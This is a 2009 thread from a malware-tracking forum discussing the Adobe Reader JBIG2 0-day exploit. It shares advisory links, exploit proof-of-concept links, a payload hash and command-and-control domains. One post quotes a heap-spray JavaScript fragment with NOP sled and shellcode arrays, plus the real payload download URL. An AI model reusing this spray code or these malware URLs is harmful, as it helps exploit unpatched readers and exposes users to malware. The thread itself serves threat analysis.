Malware Domain List

Malware Related => Tools of the trade / Internet News => Topic started by: SysAdMini on February 20, 2009, 07:06:26 am

Title: Adobe/Acrobat 0-day
Post by: SysAdMini on February 20, 2009, 07:06:26 am
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090219
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 20, 2009, 12:14:55 pm
hxxp://dump.vicp.cc/l/a.bin - url from the same 0day i suppose...
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 20, 2009, 01:37:22 pm
cnc on religion.xicp.net and religion.8866.org? Japan? WTF ???
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 21, 2009, 05:21:58 am
http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 22, 2009, 06:28:20 pm
Homebrew patch for Adobe AcroReader 9
http://vrt-sourcefire.blogspot.com/2009/02/homebrew-patch-for-adobe-acroreader-9.html
Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on February 22, 2009, 06:38:44 pm
and saw somebody working version of this? very interesting to see
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 24, 2009, 06:55:40 am
Targeted PDFs Used as Exploits
https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/vulnerabilities_exploits/article-id/188
Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 07:22:16 am
milw0rm POC-s:
http://milw0rm.com/exploits/8090
http://milw0rm.com/exploits/8099

I think that soon will attack as well as POC in public
Title: Re: Adobe/Acrobat 0-day
Post by: alta on February 24, 2009, 09:04:55 am
Thanks WIEx for the lynks  ;)
Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on February 24, 2009, 12:20:03 pm
it's DoS exploit
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 01:27:53 pm
but it works under 9 ;)
Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on February 24, 2009, 02:17:51 pm
it's only crash apllication)
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 02:27:39 pm
the new payload for me... pdf md5: 8AE719CDD29F0E6AF4D4DD321CC40355

Code: [Select]
...
                while (pointers.length<=0x100000/2)pointers+=pointers
                pointers=pointers.substring(0,0x100000/2-32/2-4/2-pointers1.length-2/2
                while (nop.length<=0x100000/2)nop+=nop
                nop=nop.substring(0,0x100000/2-32/2-4/2-jmp.length-2/2)
                var x=new Array()
                for (i=0 ; i<150 ; i++)
                {
                        x[i]=nop+shellcode
                }
                for ( ; i<201 ; i++)
                {
                        x[i]=pointers+pointers1
                }
                return x
...
(http://img10.imageshack.us/img10/5553/pdfjs.jpg)
load from
Code: [Select]
http://202.67.215.110/caonimabi.exe(http://www.robtex.com/dot/202.67.215.110,202.67.215.0/24,AS4645,olympic-2012.org,uyghurameircan.com,winupdate.crackcode.net!1AS2,0NET1,3A0,4A0,5A0!2.png)
IP is very know from several malware, ex: http://www.threatexpert.com/report.aspx?md5=39376f28624e3de9e23d6fd57235b42e (http://www.threatexpert.com/report.aspx?md5=39376f28624e3de9e23d6fd57235b42e)
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 02:30:00 pm
it's only crash apllication)
u do not know the secret   :D
Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 02:33:00 pm
Quote
it's only crash apllication)

Yes, I said that this POC (proof of concept) exploit
Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 02:38:17 pm
Serg, thx, good work:)
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 04:17:48 pm
Serg, thx, good work:)
Ur welcome)
WIEx r u from opensc.ws?  :-\ and r ur icq 274734*?
Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 04:56:05 pm
Quote
WIEx r u from opensc.ws?
No, Only as a spectator)

Quote
and r ur icq 274734*?
no:)
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 25, 2009, 07:04:27 am
Adobe Acrobat pdf 0-day exploit, No JavaScript needed
https://isc.sans.org/diary.html?storyid=5926

http://secunia.com/blog/44/
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 25, 2009, 08:03:34 am
tested on malware
(http://img301.imageshack.us/img301/1882/pdfexpl.jpg)
payload doesn't start but reader crached => exp works, no js needed... shit...
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 25, 2009, 10:14:38 am
Adobe Reader and Acrobat Issue update
http://blogs.adobe.com/psirt/ (http://blogs.adobe.com/psirt/)

Quote
Adobe is also planning to make updates available for Adobe Reader 7 and 8, and Acrobat 7 and 8, by March 18th. :o

Quote
1. Launch Acrobat or Adobe Reader.
2. Select Edit>Preferences
3. Select the JavaScript Category
4. Uncheck the Enable Acrobat JavaScript option :o
5. Click OK

I hate adobe. 1 month without solution... >:(
Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 25, 2009, 01:38:10 pm
upload this file here
Title: Re: Adobe/Acrobat 0-day
Post by: dash_neghab on February 26, 2009, 01:42:40 pm
Could we have this file for analysis also? At least entire javascript code....
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 26, 2009, 02:46:46 pm
Could we have this file for analysis also? At least entire javascript code....
No :-*
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on March 04, 2009, 06:36:12 pm
Didier Stevens decribes a howto get infected from this pdf vulnerability WITHOUT opening the pdf file !!!!

Quickpost: /JBIG2Decode Trigger Trio
http://blog.didierstevens.com/2009/03/04/quickpost-jbig2decode-trigger-trio/
Title: Re: Adobe/Acrobat 0-day
Post by: kenrry on March 09, 2009, 02:59:51 am
Could we have this file for analysis also? At least entire javascript code....
No :-*
maybe,the javascript code its not important ,javascript only make a heap spray with a address,but  from the info on the net, cant find the exploit address,so the head of jbig2decode stream i think is very important
also ,in windows,if the mouse jump to the PDF file ,the acroRD32info.exe will open it without using reader,
add me with icq 94507815 and get more info
Title: Re: Adobe/Acrobat 0-day
Post by: dash_neghab on March 13, 2009, 07:58:36 am
Thanks for PoC :-)  :-*
Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on March 13, 2009, 03:25:52 pm
tell me plz, how can I insert it in a way exploit JS source, or Shellcode (execute for example)?
Title: Re: Adobe/Acrobat 0-day
Post by: dash_neghab on March 14, 2009, 07:01:38 am
Ask Serg about it
Title: Re: Adobe/Acrobat 0-day
Post by: sowhat-x on March 14, 2009, 02:47:24 pm
He-he,I really hate "replying in place" of others,but well...I think Serg already gave his answer regarding this issue...  ::)
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on March 15, 2009, 02:30:18 pm
He-he,I really hate "replying in place" of others,but well...I think Serg already gave his answer regarding this issue...  ::)
Thank u  sowhat-x! :) I  can't reply "NO" to all sriptkiddies around the world...
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on March 25, 2009, 09:43:06 am
Adobe Reader and Acrobat JBIG2 Encoded Stream Heap Overflow Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=776
Title: Re: Adobe/Acrobat 0-day
Post by: Toaster on March 27, 2009, 09:15:16 pm
btw I forgot..
my Analysis of the PDF Exploit

http://web17.webbpro.de/index.php?page=analysing-the-pdf-exploit